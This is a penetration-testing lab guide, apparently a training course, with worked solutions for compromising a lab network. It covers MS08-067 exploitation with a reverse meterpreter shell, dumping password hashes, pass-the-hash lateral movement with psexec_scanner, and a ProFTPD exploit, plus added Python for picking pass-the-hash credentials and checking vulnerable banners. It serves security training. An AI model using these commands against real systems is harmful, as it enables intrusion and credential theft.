
HERA

LAB ID: 4

VA & EXPLOITATION
Vulnerability Assessment
Multiplatform Remote Exploitation
[VA & Exploitation] LAB ID: 4

1. LAB
In this scenario your goal is to get shell access to every machine in the
target network. To do so you have to find vulnerabilities on each
machine, exploit them and obtain a shell. Note that some exploits need
information that you can gather from other machines.

The target machines are not NATed and are reachable directly at their
IP addresses:

 NETBLOCK: 10.50.97.0/24

2. GOALS
 Find all hosts alive

 Find exploitable vulnerabilities on each host

 Detect services and OS’s

 Get a shell on each host

eLearnSecurity s.r.l. © 2012 | H E R A 2



3. WHAT YOU WILL LEARN


 Vulnerability Assessment

 Exploitation

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of
different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired through the tasks you can achieve the lab
goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of
this paper and check the solutions.

4. RECOMMENDED TOOLS
 Nessus

 Metasploit


5. TASKS
Task 1. Host Discovery and Vulnerability Assessment

Perform host discovery and then use a vulnerability scanner tool (such as
Nessus) to find if and which machines are vulnerable.

Task 2. Vulnerable targets

With the list of hosts and vulnerabilities, think about how to plan the
attack. There are different vulnerabilities you can exploit, but some of
them require specific prerequisites. Please note that the following tasks
will guide you through the exploitation process, but there are different
ways to achieve the same goal.

Task 3. Target 1 exploitation

You should now have a list of machines with their vulnerabilities. Set up
Metasploit to exploit the first target, the machine 10.50.97.5.

Task 4. Get users and hashes

You should now have a meterpreter session on the target. Since we want
to exploit all the other machines, we can dump the password hashes in order
to crack them, or use them directly to exploit further targets.


Task 5. Exploitation: PSExec on the network

Now that we have a list of usernames and password hashes, we could try
to crack them, or use the PSExec exploit to get access to other machines.
Since we want to exploit all machines, we can use Carlos Perez's 'PSExec
Scanner' module, which tries the exploit against many machines at the
same time.

Here you can find the link that explains how to add the module to
Metasploit:
(http://pauldotcom.com/2011/12/psexec-scanner-module.html). Please
note that, since the GitHub URL provided in the guide no longer works,
you have to create psexec_scanner.rb manually in the
".msf4/modules/auxiliary/scanner/smb/" folder and copy into it the
script from this link:

https://github.com/darkoperator/Meterpreter-Scripts/blob/master/auxiliary/scanner/smb/psexec_scanner.rb

Task 6. Target 4 exploitation

We should now have control of all target machines except one (Target
4). We know that only one service is running on that host. We can then
try to detect the service version and check whether it is vulnerable to
known exploits.


Solutions


Task 1. Vulnerability Assessment

To discover live hosts, we can run Nmap with our preferred settings:

>>nmap -sn 10.50.97.0/24


We will get the following alive hosts:

10.50.97.1
10.50.97.5
10.50.97.8
10.50.97.14
10.50.97.21

We can now set up Nessus to scan the hosts found and look for exploitable
vulnerabilities on each of them.


Task 2. Vulnerable targets

From the results of the Nessus scan we can devise different attack
plans. Here is the one we will use in the next steps. Please note that you
might have followed a different approach, and that is perfectly fine.

 Try to exploit target 10.50.97.5 with ms08_067

 If it succeeds, dump the password hashes

 Use the "PSExec scanner" module with the dumped hashes

 Exploit the remaining machine depending on its enabled services and vulnerabilities

Task 3. Exploitation: ms08_067

In Task 1 we discovered that the machine with IP 10.50.97.5 is
vulnerable to ms08_067 (MS08-067). We can start exploiting this machine
by setting up Metasploit as follows:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.50.97.5
RHOST => 10.50.97.5
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.5.42
LHOST => 172.16.5.42
msf exploit(ms08_067_netapi) > exploit

Note: running the Nmap smb-check-vulns script or a Nessus scan after
exploiting the machine with the ms08_067_netapi module could crash the
target service!


Task 4. Get users and hashes

Since SMB is enabled on the other machines, we can try to exploit them
with the pass-the-hash technique. This needs a valid username and
password hash pair, so once we have the meterpreter session on Target 1
we can easily dump the password hashes with the following command:
meterpreter > hashdump
Administrator:500:6df60586675b97c51f6252914a7633d7:fc5399dc481550f5442d1585e10c0345:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:485abeee55c20847527b7d40c923ce73:800a821fd8e8fd957fb7e2142e4ec10a:::
netadmin:1003:a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0753109d18a27933666907e9069009c2:::
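
Reading a hashdump correctly matters before spraying it across the network. The following is an added example, not part of the lab: it parses the pwdump-format records above into accounts, recognises the two well-known constant hashes (the "no LM hash stored" marker and the NT hash of the empty password), and emits the SMBUser/SMBPass pairs worth trying with psexec. It reuses the lab's own dump as input; records are re-joined if a copy-and-paste wrapped them mid-hash, as PDF rendering often does.

```python
"""Parse meterpreter `hashdump` output and pick pass-the-hash candidates.

Added example, not from the lab text. hashdump emits pwdump-format records,
user:RID:LM_hash:NT_hash:::, one per local account. Two constants matter when
reading them: the LM field aad3b435b51404eeaad3b435b51404ee means no LM hash
is stored, and the NT field 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash
of the empty password. The sample below reuses the lab's dump, wrapped
mid-hash the way a PDF copy-and-paste often is; the parser re-joins it.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterator

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# The lab's hashdump output, with the line wraps a PDF copy-and-paste produces.
SAMPLE_HASHDUMP = """\
Administrator:500:6df60586675b97c51f6252914a7633d7:fc5399dc481550f5442d15
85e10c0345:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089
c0:::
HelpAssistant:1000:485abeee55c20847527b7d40c923ce73:800a821fd8e8fd957fb7e
2142e4ec10a:::
netadmin:1003:a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfad
d88874:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0753109d18a2793366
6907e9069009c2:::
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def smbpass(self) -> str:
        """Value for the SMBPass option of psexec / psexec_scanner (LM:NT)."""
        return f"{self.lm}:{self.nt}"

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM


def _records(text: str) -> Iterator[str]:
    """Re-join records wrapped across lines; every pwdump record ends in ':::'."""
    buf = ""
    for line in text.splitlines():
        buf += line.strip()
        if buf.endswith(":::"):
            yield buf
            buf = ""
    if buf:
        raise ValueError(f"truncated record: {buf!r}")


def parse_hashdump(text: str) -> list[Account]:
    accounts = []
    for rec in _records(text):
        user, rid, lm, nt = rec.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        if len(lm) != 32 or len(nt) != 32 or not rid.isdigit():
            raise ValueError(f"malformed pwdump record: {rec!r}")
        accounts.append(Account(user, int(rid), lm, nt))
    return accounts


def pth_candidates(accounts: list[Account], skip_rids: tuple[int, ...] = (501,)) -> list[Account]:
    """Accounts worth trying with pass-the-hash: a real NT hash and not Guest.

    hashdump does not show the account-disabled flag, so built-ins such as
    HelpAssistant and SUPPORT_388945a0 are kept here and will simply fail
    against hosts where they are disabled.
    """
    return [a for a in accounts if not a.blank_password and a.rid not in skip_rids]


if __name__ == "__main__":
    for acct in pth_candidates(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"set SMBUser {acct.user}")
        print(f"set SMBPass {acct.smbpass}")
```

Guest is dropped because its NT hash is the empty-password constant; every other account has an LM-less or full hash pair that psexec accepts as-is, which is why the lab can use the netadmin line without cracking it.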

Task 5. Exploitation: PSExec on the network

Now that we have the password hashes, we can try to run PSExec against the
entire network and see whether we are able to get access to further machines.
To do so, let's set up the psexec_scanner module this way:
msf auxiliary(psexec_scanner) > set LHOST 172.16.5.42
LHOST => 172.16.5.42
msf auxiliary(psexec_scanner) > set LPORT 4455
LPORT => 4455
msf auxiliary(psexec_scanner) > set RHOSTS 10.50.97.4-22
RHOSTS => 10.50.97.4-22
msf auxiliary(psexec_scanner) > set SMBUser netadmin
SMBUser => netadmin
msf auxiliary(psexec_scanner) > set SMBPass a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874
SMBPass => a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
msf auxiliary(psexec_scanner) > run


Note that the module is set up to run the exploit with the 'netadmin'
username and its password hash.

Once you run the module, you should have two more meterpreter
sessions:
msf auxiliary(psexec_scanner) > sessions

Active sessions
===============

  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ELS-WIN03       172.16.5.42:4455 -> 10.50.97.8:1048 (10.50.97.8)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ELS-WINSER2003  172.16.5.42:4455 -> 10.50.97.14:1030 (10.50.97.14)

Task 6. Exploitation: ProFTPD

At this point we should have only one machine left un-exploited.

In Task 1, Nessus detected an FTP server on 10.50.97.21.

We can dig deeper and run Nmap to see whether we can identify which
software is running on each port. To do that we can use the following
command:

>>nmap -sV 10.50.97.21


The tool tells us that the FTP service is ProFTPD 1.3.2a. A little
research shows that this version is vulnerable to remote exploitation, and
Metasploit already has a module for it, so let's set it up and see
whether we can get a shell:
msf > use exploit/freebsd/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 10.50.97.21
RHOST => 10.50.97.21
msf exploit(proftp_telnet_iac) > exploit

After a few retries, the exploit works, and we have a shell on the machine.
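
The "research" step above is a version check against a known affected range, and ProFTPD's version strings (rcN pre-releases, lettered maintenance releases) make a naive string comparison wrong. The following is an added example, not part of the lab or of Metasploit: it extracts the version from an FTP 220 greeting and decides whether it falls in the range hit by the Telnet IAC overflow (CVE-2010-4221, the bug behind the proftp_telnet_iac modules: 1.3.2rc3 through 1.3.3b, fixed in 1.3.3c). The banners it runs on are constructed; the first mirrors what the lab's nmap -sV reported.

```python
"""Check an FTP greeting for a ProFTPD version in the Telnet IAC overflow range.

Added example, not part of the lab. The bug Metasploit's proftp_telnet_iac
modules exploit is CVE-2010-4221; the upstream advisory lists 1.3.2rc3 through
1.3.3b as affected, with the fix in 1.3.3c. This is a banner check only: a
distribution may backport the fix and keep the old version string, and
ServerIdent off hides the version entirely, so treat the result as a lead,
not proof. The banners used below are constructed.
"""
from __future__ import annotations

import re
import socket
from typing import Optional

VULN_FROM = "1.3.2rc3"
FIXED_IN = "1.3.3c"

# ProFTPD version strings: x.y.z, optionally rcN (pre-release) or a letter
# suffix (maintenance release), e.g. 1.3.2rc3, 1.3.2a, 1.3.3.
_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?([a-z])?$")
_BANNER_RE = re.compile(r"ProFTPD\s+(\S+?)\s+Server", re.IGNORECASE)


def parse_version(ver: str) -> tuple[int, ...]:
    """Map a version string to a tuple that sorts rcN < final < a < b < ...

    The fourth element is the stage (0 = release candidate, 1 = released),
    the fifth the rc number or the letter's ordinal (0 for a plain release).
    """
    m = _VER_RE.match(ver.strip())
    if not m:
        raise ValueError(f"unrecognised ProFTPD version: {ver!r}")
    major, minor, patch, rc, letter = m.groups()
    if rc is not None:
        stage, sub = 0, int(rc)
    else:
        stage, sub = 1, (ord(letter) - ord("a") + 1) if letter else 0
    return (int(major), int(minor), int(patch), stage, sub)


def in_cve_2010_4221_range(ver: str) -> bool:
    """True when VULN_FROM <= ver < FIXED_IN under ProFTPD's version ordering."""
    v = parse_version(ver)
    return parse_version(VULN_FROM) <= v < parse_version(FIXED_IN)


def version_from_banner(banner: str) -> Optional[str]:
    """Pull the version out of a 220 greeting such as
    '220 ProFTPD 1.3.2a Server (ProFTPD Default Installation) [10.50.97.21]'."""
    m = _BANNER_RE.search(banner)
    return m.group(1) if m else None


def assess_banner(banner: str) -> Optional[bool]:
    """True/False for a ProFTPD banner inside/outside the affected range,
    None when the banner does not reveal a parsable ProFTPD version."""
    ver = version_from_banner(banner)
    if ver is None:
        return None
    try:
        return in_cve_2010_4221_range(ver)
    except ValueError:
        return None


def grab_banner(host: str, port: int = 21, timeout: float = 5.0) -> str:
    """Read the FTP greeting from a live target (network call, not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        return s.recv(1024).decode("latin-1", "replace").strip()


if __name__ == "__main__":
    # Constructed banners; the first mirrors what the lab's nmap -sV reported.
    for b in (
        "220 ProFTPD 1.3.2a Server (ProFTPD Default Installation) [10.50.97.21]",
        "220 ProFTPD 1.3.3c Server (Debian) [::ffff:192.0.2.10]",
        "220 ProFTPD 1.3.2rc2 Server",
        "220 (vsFTPd 2.3.4)",
    ):
        print(f"{assess_banner(b)!s:5} {b}")
```

The ordering rule is the part worth keeping: "1.3.2rc3" must sort below "1.3.2", and "1.3.2a" above it, or the range test silently misclassifies the very build the lab targets. Note also that the module chosen in the lab is the FreeBSD one; the same version check says nothing about the target OS, which you still have to confirm from the Nmap or Nessus output before picking a module.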